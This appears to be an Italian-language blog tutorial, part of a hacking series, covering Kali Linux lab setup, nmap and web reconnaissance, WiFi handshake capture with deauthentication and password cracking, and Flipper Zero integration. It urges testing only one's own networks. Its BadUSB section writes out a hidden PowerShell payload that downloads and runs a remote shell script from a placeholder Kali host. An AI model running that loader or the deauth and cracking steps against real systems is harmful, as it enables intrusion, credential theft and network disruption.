Menu
Chi sono Servizi Percorso Lavora con me
Linux terminal with code
Sicurezza Mar 7, 2026 • 25 min di lettura

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Condividi:
Lee Foropoulos

Lee Foropoulos

25 min di lettura

Il Percorso dell'Hacker: Serie in 5 Parti

Parte 1: IntroduzioneParte 2: Padronanza del FlipperParte 3: Fondamenti di KaliParte 4: ExploitationParte 5: L'Audit Completo

Nelle Parti 1 e 2, hai clonato carte, analizzato frequenze radio e capito perche la maggior parte della "sicurezza" e solo apparenza. Hai visto le vulnerabilita dall'esterno. Ora entri dentro e le vedi dalla prospettiva dell'attaccante.

Kali Linux e la distribuzione standard del settore per il penetration testing. Viene precaricata con oltre 600 strumenti di sicurezza. Questo puo sembrare travolgente. La maggior parte dei tutorial ti butta in acqua profonda con comandi che non capisci e senza contesto sul perche siano importanti.

Noi facciamo le cose diversamente. Alla fine di questo articolo, avrai un laboratorio funzionante, comprenderai la ricognizione di rete a livello fondamentale e catturerai il tuo primo WiFi handshake. Ogni passo si costruisce sul precedente.

La maggior parte dei tutorial ti butta in acqua profonda con comandi che non capisci e senza contesto sul perche siano importanti. Ogni passo qui si costruisce sul precedente.

Parte 1: Costruire il Tuo Laboratorio

I penetration tester professionisti non eseguono Kali sulla loro macchina principale. Usano ambienti isolati che possono essere resettati, salvati come snapshot e distrutti senza influenzare il sistema primario. Farai lo stesso.

Opzione A: Macchina Virtuale (Consigliata per l'Apprendimento)

Una macchina virtuale ti offre l'ambiente di apprendimento piu sicuro. Puoi salvare snapshot dei tuoi progressi, fare errori e tornare indietro istantaneamente.

Cosa Ti Servira

  • Macchina host: 16GB+ RAM, 50GB+ spazio disco libero, CPU moderna con supporto alla virtualizzazione
  • Software di virtualizzazione: VirtualBox (gratuito) o VMware Workstation Player (gratuito per uso personale)
  • Kali Linux: VM pre-costruita ufficiale da kali.org

Progetto: Setup della Kali VM

Tempo: 30-45 minuti

Passaggi:

  1. Scarica l'immagine VM di Kali per il tuo hypervisor (VirtualBox o VMware)
  2. Estrai l'archivio scaricato (7-Zip consigliato per Windows)
  3. Importa la VM nel tuo hypervisor
  4. Configura le risorse: minimo 4GB RAM (8GB consigliati), 2+ core CPU
  5. Abilita l'adattatore di rete in modalita "Bridged" per accesso completo alla rete
  6. Avvia la VM e accedi con le credenziali predefinite: kali / kali
  7. Apri il terminale ed esegui: sudo apt update && sudo apt full-upgrade -y
  8. Crea uno snapshot chiamato "Fresh Install" per un facile ripristino

Verifica: Puoi aprire un terminale, eseguire whoami e vedere kali.

Opzione B: Hardware Dedicato (Per Pratica Seria)

Una volta che sei a tuo agio con Kali, l'hardware dedicato elimina l'overhead della VM e abilita l'accesso completo all'hardware, essenziale per i test wireless.

Consigli sull'Hardware

Opzione economicaThinkPad X230/T430 usato ($100-150), WiFi Intel sostituito con Atheros AR9285
Opzione modernaFramework Laptop con modulo WiFi compatibile Linux
Sensore dedicatoRaspberry Pi 5 4GB con adattatore esterno Alfa AWUS036ACH

Per ora, una VM e perfetta. L'hardware dedicato diventa importante quando hai bisogno della modalita monitor per i test wireless (trattata piu avanti in questo articolo).

Opzione C: Live USB (Zero Persistenza)

Una Live USB esegue Kali direttamente senza installazione. Tutto scompare quando spegni. Utile per testare su hardware diverso, ma perderai il tuo lavoro ad ogni sessione a meno che non crei una partizione persistente.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd Distrugge i Dati

Il comando dd scrive direttamente sul disco senza conferma. Controlla tre volte il nome del dispositivo. Scrivere sul dispositivo sbagliato cancellera completamente quel drive.

Kali Linux terminal with security tools running
Un ambiente Kali Linux configurato correttamente e la base di ogni penetration test professionale.

Parte 2: La Mentalita del Terminale

Prima di toccare strumenti di sicurezza, devi sentirti a tuo agio nel terminale. Non e opzionale. La GUI esiste in Kali, ma il vero lavoro si fa sulla riga di comando.

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

Escalation dei Privilegi

Molti strumenti di sicurezza richiedono accesso root. In Kali, sudo ti da privilegi root temporanei.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root con Responsabilita

Eseguire come root significa nessuna rete di sicurezza. Un errore di battitura come rm -rf / distruggera tutto. Il Kali moderno impedisce questo specifico comando, ma il principio vale: capisci cosa stai eseguendo prima di eseguirlo.

Gestione dei Processi

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

Comandi di Rete

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

Progetto: Orientamento al Terminale

Tempo: 15 minuti

Compiti:

  1. Trova il tuo indirizzo IP sulla rete locale usando ip a
  2. Identifica il tuo gateway predefinito usando ip route
  3. Fai un ping al tuo gateway per confermare la connettivita
  4. Elenca tutti i file in /etc ordinati per tempo di modifica: ls -lt /etc | head
  5. Leggi le prime 50 righe di /etc/passwd: head -n 50 /etc/passwd

Obiettivo: Dovresti essere in grado di navigare, controllare lo stato della rete e leggere file senza pensarci.

Parte 3: Ricognizione di Rete con Nmap

Nmap (Network Mapper) e lo strumento piu importante che imparerai. Scopre host, identifica servizi, rileva sistemi operativi e mappa la topologia di rete. Tutto il resto si costruisce sull'output di nmap.

La Tua Prima Scansione

Scansioniamo la tua rete. Prima, identifica il range della tua rete:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

Vedrai un output come questo:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Quella prima scansione ti dice: "Questi dispositivi esistono sulla mia rete." Ora facciamo domande piu profonde.

Rilevamento dei Servizi

Una volta che sai quali host esistono, vuoi sapere quali servizi stanno eseguendo.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

Output tipico:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

Rilevamento del Sistema Operativo

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

Capire gli Stati delle Porte

Nmap riporta le porte in diversi stati:

  • open - Applicazione che accetta attivamente connessioni. Questo e cio che cercano gli attaccanti.
  • closed - Porta accessibile ma nessuna applicazione in ascolto. L'host e attivo ma non c'e niente li.
  • filtered - Firewall o filtro che blocca la sonda. Non si puo determinare se aperta o chiusa.
  • unfiltered - Porta accessibile ma nmap non riesce a determinare se aperta o chiusa.

Tipi di Scansione e Stealth

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

NSE estende nmap con script specializzati per il rilevamento di vulnerabilita, l'enumerazione dei servizi e molto altro.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

Progetto: Mappa la Tua Rete

Tempo: 30 minuti

Prerequisiti: Conosci il range della tua rete da ip a

  1. Scopri tutti gli host: sudo nmap -sn YOUR_NETWORK/24
  2. Elenca gli host scoperti e i loro indirizzi MAC
  3. Scegli il tuo router (di solito .1) ed esegui: sudo nmap -sV -sC YOUR_ROUTER
  4. Identifica tutte le porte aperte e i servizi sul tuo router
  5. Esegui sudo nmap -A YOUR_COMPUTER per vedere cosa espone la tua macchina

Documenta: Crea un file di testo che elenca ogni dispositivo, il suo IP, MAC e servizi. Questa e la tua mappa di rete.

Scansiona Solo Reti di Tua Proprieta

Scansionare reti senza autorizzazione e illegale nella maggior parte delle giurisdizioni. Anche una semplice scansione nmap puo essere considerata accesso non autorizzato. Resta sulla tua rete, le tue apparecchiature e reti dove hai esplicita autorizzazione scritta.

Parte 4: Ricognizione Web

La tua scansione nmap ha probabilmente trovato servizi HTTP (porte 80, 443, 8080). Capiamo cosa sta girando li.

Whatweb: Identificazione Rapida del Servizio

bash# Identify web technologies
whatweb http://192.168.1.1

Esempio di output:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: Scanner di Vulnerabilita Web

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

Enumerazione delle Directory: Cosa e Nascosto?

I web server spesso hanno directory non collegate dalla pagina principale: pannelli di amministrazione, file di configurazione, file di backup.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Scoperte comuni:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Posizione delle Wordlist

Kali include wordlist estese in /usr/share/wordlists/. Le directory piu comuni: dirb/, dirbuster/, rockyou.txt (password) e seclists/ (collezione completa).

Progetto: Verifica l'Interfaccia Web del Tuo Router

Tempo: 20 minuti

  1. Esegui whatweb http://YOUR_ROUTER_IP per identificare il server
  2. Esegui nikto -h http://YOUR_ROUTER_IP per verificare vulnerabilita
  3. Esegui gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. Visita le directory scoperte in un browser
  5. Annota pannelli di amministrazione, numeri di versione o scoperte interessanti

Scoperta comune: Pagine di amministrazione del router esposte con credenziali predefinite.

Server room with network infrastructure
La ricognizione di rete rivela la topologia completa dell'ambiente target, dai router ai servizi nascosti.

Parte 5: Ricognizione Wireless

Qui le cose si fanno interessanti. Le reti WiFi trasmettono costantemente, e con gli strumenti giusti, puoi catturare handshake di autenticazione: lo scambio crittografato che avviene quando un dispositivo si connette.

Requisiti Hardware

Il tuo WiFi integrato probabilmente non funzionera per questo. Hai bisogno di un adattatore che supporti la modalita monitor e la packet injection. Consigliati: Alfa AWUS036ACH ($50) o Alfa AWUS036ACM ($45). Funzionano subito con Kali.

Capire la Modalita Monitor

La modalita WiFi normale ("managed mode") riceve solo i pacchetti indirizzati al tuo dispositivo. La modalita monitor cattura tutti i pacchetti nel raggio d'azione, il traffico di ogni dispositivo sul canale.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

Scansione delle Reti

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

Quello che stai vedendo e ogni rete WiFi nel raggio, le loro impostazioni di sicurezza e spesso i dispositivi connessi. Questo e cio che vede un war driver quando scansiona i quartieri.

Cattura dell'Handshake

Quando un dispositivo si connette a una rete WPA2, c'e un four-way handshake. Se catturi questo handshake, puoi tentare di craccare la password offline.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

Quando catturi un handshake, airodump-ng mostra [ WPA handshake: XX:XX:XX:XX:XX:XX ] nell'angolo in alto a destra.

Gli Attacchi Deauth Sono Illegali

Inviare pacchetti di deautenticazione a reti che non possiedi e un reato federale ai sensi del Computer Fraud and Abuse Act (negli USA) e leggi simili altrove. Testa solo sulla tua rete. L'obiettivo e capire la vulnerabilita, non attaccare altri.

Cracking dell'Handshake

Con un handshake catturato, puoi tentare di craccare la password offline usando una wordlist:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Password reali da vere violazioni di dati sono incluse in rockyou.txt, la wordlist predefinita usata per craccare i WiFi handshake catturati.

Verifica della Robustezza delle Password

rockyou.txt contiene 14+ milioni di password da vere violazioni di dati. Se la tua password WiFi e "password123" o "summer2024" o il nome del tuo cane, e craccabile in secondi. Una password casuale di 12+ caratteri richiederebbe milioni di anni per un brute-force.

Progetto: Testa la Sicurezza del Tuo WiFi

Tempo: 45 minuti

Prerequisiti: Adattatore WiFi esterno con supporto modalita monitor

  1. Abilita la modalita monitor: sudo airmon-ng start wlan0
  2. Scansiona le reti: sudo airodump-ng wlan0mon
  3. Annota il canale e il BSSID della tua rete
  4. Cattura sul tuo canale: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. Riconnetti un dispositivo al tuo WiFi (o usa deauth sulla TUA rete)
  6. Conferma la cattura dell'handshake
  7. Testa contro rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

Risultato: Se la tua password e stata trovata, cambiala immediatamente con qualcosa di casuale e lungo (20+ caratteri).

Parte 6: Collegare il Tuo Flipper Zero

Ricordi tutte quelle catture dalla Parte 2? Integriamole nel tuo workflow con Kali.

Trasferimento File

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

Analisi dei Dump NFC

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Analisi Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

Sviluppo BadUSB

Crea payload BadUSB in Kali, testali sul Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

I Payload BadUSB Sono Potenti

Questi script si eseguono automaticamente quando vengono collegati. Un payload malevolo potrebbe installare backdoor, rubare credenziali o distruggere dati in secondi. Usa solo sulle tue macchine per testing. Non lasciare mai il tuo Flipper dove qualcun altro potrebbe collegarlo.

Parte 7: Documentazione e Workflow

I penetration tester professionisti non eseguono solo strumenti. Documentano tutto. Una buona documentazione separa i dilettanti dai professionisti.

Presa di Note con CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Salvare l'Output di Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

Logging della Sessione

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

Il Percorso dell'Hacker

Una serie in 5 parti che ti porta da curioso a capace.

Parte 1: Introduzione Parte 2: Padronanza del Flipper Parte 3: Fondamenti di Kali ✓ Parte 4: Exploitation Parte 5: Audit Completo

Checklist della Parte 3

☐ Setup del Lab: Kali VM in esecuzione, aggiornata, snapshot salvato

☐ Terminale: A proprio agio con navigazione, permessi, controllo processi

☐ Nmap: Rete mappata, servizi identificati, router scansionato

☐ Ricognizione Web: Interfaccia web del router analizzata con whatweb/nikto

☐ Wireless: Modalita monitor abilitata, reti scansionate

☐ Handshake: Handshake WiFi personale catturato e testato

☐ Flipper: File trasferiti, workflow compreso

☐ Documentazione: Note organizzate, scansioni salvate

Piano d'Azione Fondamenti di Kali 0/6

Cosa Viene Dopo

Hai costruito il tuo laboratorio e imparato la fase di ricognizione. Puoi scoprire host, identificare servizi e catturare handshake wireless. Capisci cosa vedono gli attaccanti quando guardano una rete.

Nella Parte 4, passiamo dalla ricognizione all'exploitation. Imparerai:

  • Metasploit Framework, il coltellino svizzero dell'exploitation
  • Workflow comuni di exploitation delle vulnerabilita
  • Tecniche di post-exploitation: cosa succede dopo l'accesso iniziale
  • Escalation dei privilegi: da utente normale ad amministratore
  • Pivoting: usare un sistema compromesso per attaccarne altri

La ricognizione ti dice dove sono le porte. L'exploitation ti insegna come attraversarle.

Hai mappato il territorio. Ora impari a navigarlo. La Parte 4 ti porta da osservatore a operatore.

Ci vediamo nella Parte 4.

How was this article?

Condividi

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Non perdere nessun articolo

Ricevi una notifica quando vengono pubblicati nuovi articoli. Nessuna email richiesta.

Vedrai un banner sul sito quando viene pubblicato un nuovo articolo, oltre a una notifica del browser se lo consenti.

Solo notifiche del browser. Niente spam, niente email.